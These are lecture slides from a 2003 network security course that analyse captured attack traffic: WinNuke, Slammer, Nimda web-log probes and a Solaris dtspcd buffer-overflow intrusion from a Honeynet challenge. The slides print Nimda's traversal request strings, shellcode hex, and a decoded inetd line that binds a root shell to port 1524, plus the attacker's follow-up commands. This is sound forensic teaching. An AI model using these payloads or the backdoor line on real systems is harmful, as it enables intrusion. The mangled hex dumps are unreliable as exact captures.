Lecture 25: Network Primer 7/17/2003 CSCE 590 Summer 2003
WinNuke nuker.com > victim.edu.139: FP 0:3(3) ack 1 win 8760 urg 3 (DF)
And This? 3:46: dos.com > : (frag 3:46: dos.com > : (frag 3:46: dos.com > : (frag 3:46: dos.com > : (frag 3:46: dos.com > : (frag 3:46: dos.com > : (frag 3:46: dos.com > : (frag 3:46: dos.com > : (frag 3:46: dos.com > : (frag 3:46: dos.com > : (frag
Bad Network Traffic in Other places Web logs Traffic monitoring graphs Firewall logs Intrusion detection systems Router syslogs I even see attempts against my SSH tunnels!
Slammer 02:06: > ms-sql-m: udp :06: > : icmp: udp port ms-sql-m unreachable [tos 0xc0]
Nimda [12/Apr/2002:12:01: ] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 – [12/Apr/2002:12:01: ] "GET /scripts/..%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" [12/Apr/2002:12:01: ] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 -
Firewall Logs
Intrusion Detection Systems Lets us detect signatures inside packets It would be very hard to write a tcpdump filter for Nimda More versatile than tcpdump Tcpdump is more universal and quicker Tcpdump allows you to record all traffic, an IDS usually only records matches on signatures
Solaris dtspcd Attack Honeynet.org Scan of the Month Scan 20 Let’s just scan through the network capture with tcpdump and see what we see Then we’ll look at it with Ethereal
10:45: IP > : P 1:34(33) ack 1 win (DF) 0x a c6 d03d 01a0 0x0010 ac e06 17e0 fe2a 6e27 5f37 bfc2...f.....*n'_7.. 0x ebc 845d a 1ba7 dbc0..>..] x f 710d ?q x f6f d root. 0x :45: IP > :. ack 34 win <no p,nop,timestamp > (DF) 0x a f06 51ec ac x0010 d03d 01a0 17e0 0e06 5f37 bfc2 fe2a 6e48.=......_7...*nH 0x d a 003f `(} ?q. 0x0030 1ba7 dbc :45: IP > : P 1:68(67) ack 34 win (DF) 0x a f06 51a8 ac x0010 d03d 01a0 17e0 0e06 5f37 bfc2 fe2a 6e48.=......_7...*nH 0x cc a 003f `(V ?q# 0x0030 1ba7 dbc x f 2f2e f //.SP 0x f f C_AAAH_aqWg x a 7a79 3a53 756e 4f53 3a35 2e38.buzzy:SunOS:5.8 0x0070 3a73 756e :sun4u.
What did we see? Src address: Dst address: Target port: 6112 –Solaris Common Desktop Environment –Dtspcd: CDE Subprocess Control Service –network daemon that accepts requests from clients to execute commands and launch applications remotely –Runs as root –Usually spawned by inetd or xinetd in response to CDE client request
What else? In the first packet from attacker to victim, we see the word “root”. Hmmmm Then the victim starts answering back In the third packet it announces what operating system it is running and its architecture Going on…
10:46: IP > : P 1:1449(1448) ack 1 w in (DF) 0x dc a1ac c d03d 01a0 0x0010 ac e08 17e0 fee2 c115 5f66 192f...f _f./ 0x ebc e1e a 1ba7 dffb..> x f ?uH x e x c c c 0x c c c c 0x c c c c 0x c c c c 0x c c c c Etc …. Etc …. Cut here…. 0x04d0 801c c c c 0x04e0 801c c c c 0x04f0 20bf ffff 20bf ffff 7fff ffff 9003 e x e020 a c a c02a 2008.# *.. 0x0510 c02a 200e d023 ffe0 e223 ffe4 e423 ffe8.*...#...#...#.. 0x0520 c023 ffec b 91d f62 696e.# /bin 0x0530 2f6b d f /ksh....-c..echo 0x e c6f 636b "ingreslock.str 0x d e6f eam.tcp.nowait.r 0x0560 6f6f f62 696e 2f d oot./bin/sh.sh.- 0x e2f 746d 702f 783b 2f f73 i">/tmp/x;/usr/s 0x e2f 696e d73 202f 746d bin/inetd.-s./tm 0x f 783b 736c b2f 6269 p/x;sleep.10;/bi 0x05a0 6e2f 726d 202d f74 6d70 2f n/rm.-f./tmp/x.A 0x05b AAAAAAAAAAAAAAAA 0x05c AAAAAAAAAAAAAAAA 0x05d AAAAAAAAAAAA
Now what did we see? Lots of “801C 4011”, cut out 67 lines of them We have here a Sparc NOP slide –An Intel x86 slide would have “90 90”s –Common technique in buffer-overflow attacks –Try to get exploited program to execute shell code as the program owner –Increases odds buffer overflow will execute exploit code without havig to figure out exact locations –If buffer overflow pointer lands in them, exploit code will eventually be run
What code will be run? If we read the shell code, we’d see that the following will be exec’ed: 1../bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh -i“>/tmp/x; 2./usr/sbin/inetd -s /tmp/x; 3.sleep 10; 4./bin/rm -f /tmp/x Line 1 uses a ksh to execute an echo command. The echo, writes a pre-formatted inetd line to a temp file, /tmp/x Line 2: runs inetd, using /tmp/x as its configuration Line 3: sleeps 10 seconds, make sure inetd is started Line 4: cleans up the evidence
The inetd Line What does the inetd line do? ingreslock stream tcp nowait root /bin/sh sh -i Ingreslock is TCP port 1524 This line opens up an interactive root shell when someone connects to TCP port 1524 Guess what happens a little later?
10:46: IP > : P 1:209(208) ack (DF) 0x a1cc d4 d03d 01a0 0x0010 ac e0c 05f4 fff fbb f %_... 0x ebc a 1ba7 e57b..>.P { 0x f 7ac8 756e 616d d61 3b6c 7320.?z.uname.-a;ls. 0x0040 2d6c 202f 636f f f l./core./var/dt 0x0050 2f74 6d70 2f e 6c6f 673b /tmp/DTSPCD.log; 0x d2f f 6c6f c2f PATH=/usr/local/ 0x e3a 2f f62 696e 3a2f 6269 bin:/usr/bin:/bi 0x0080 6e3a 2f f e3a 2f n:/usr/sbin:/sbi 0x0090 6e3a 2f f f62 696e 3a2f n:/usr/ccs/bin:/ 0x00a f 676e 752f e3b f usr/gnu/bin;expo 0x00b b f rt.PATH;echo."BD 0x00c a d66.PID(s):."`ps.-f 0x00d c d73 202f 746d ed|grep.'.-s./tm 0x00e0 702f c d p/x'|grep.-v.gre 0x00f0 707c b20 277b e p|awk.'{print.$2 0x0100 7d27 600a }'`.
10:46: IP > : P 1:209(208) ack (DF) 0x a1cc d4 d03d 01a0 0x0010 ac e0c 05f4 fff fbb f %_... 0x ebc a 1ba7 e57b..>.P { 0x f 7ac8 756e 616d d61 3b6c 7320.?z.uname.-a;ls. 0x0040 2d6c 202f 636f f f l./core./var/dt 0x0050 2f74 6d70 2f e 6c6f 673b /tmp/DTSPCD.log; 0x d2f f 6c6f c2f PATH=/usr/local/ 0x e3a 2f f62 696e 3a2f 6269 bin:/usr/bin:/bi 0x0080 6e3a 2f f e3a 2f n:/usr/sbin:/sbi 0x0090 6e3a 2f f f62 696e 3a2f n:/usr/ccs/bin:/ 0x00a f 676e 752f e3b f usr/gnu/bin;expo 0x00b b f rt.PATH;echo."BD 0x00c a d66.PID(s):."`ps.-f 0x00d c d73 202f 746d ed|grep.'.-s./tm 0x00e0 702f c d p/x'|grep.-v.gre 0x00f0 707c b20 277b e p|awk.'{print.$2 0x0100 7d27 600a }'`.
What happened here? Looks scripted. Why? 1.uname -a; 2.ls -l /core/var/dt/tmp/DTSPCD.log; 3.PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/s bin:/usr/ccs/bin:/usr/gnu/bin; 4.export PATH; 5.echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`
10:46: IP > : P 3:98(95) ack 209 win (DF) 0x aa f06 516e ac x0010 d03d 01a0 05f4 0e0c 5fbb 0119 fff7 80f5.=......_ x a 003f 7ae3..`($ ?z. 0x0030 1ba7 e58d e4f a7a SunOS.buzzy. 0x e e f Generic_1085 0x d e sun4u.spar 0x e57 2c55 6c d35 5f31 c.SUNW,Ultra-5_1 0x a 2f63 6f72 653a 204e 6f /core:.No.such 0x c f f.file.or.directo 0x a ry. 10:46: IP > : P 98:148(50) ack 209 win (DF) 0x aa f06 519a ac x0010 d03d 01a0 05f4 0e0c 5fbb 0178 fff7 80f5.=......_..x.... 0x ff a 003f 7aed..`( ?z. 0x0030 1ba7 e598 2f f64 742f 746d 702f..../var/dt/tmp/ 0x e6c 6f67 3a20 4e6f 2073 DTSPCD.log:.No.s 0x c65 206f uch.file.or.dire 0x f72 790a ctory. 10:46: IP > : P 148:164(16) ack 209 win (DF) 0x aa f06 51bb ac x0010 d03d 01a0 05f4 0e0c 5fbb 01aa fff7 80f5.=......_ x c a 003f 7b00..`(.R ?{. 0x0030 1ba7 e5a a BD.PID(s):.3 0x a 476.
The Output from the Commands 1.# SunOS buzzy 5.8 Generic_ sun4u sparc SUNW,Ultra-5_10 2./core: No such file or directory 3./var/dt/tmp/DTSPCD.log: No such file or directory 4.BD PID(s): 3476
Interactive Commands Let’s go to Ethereal for this part…
References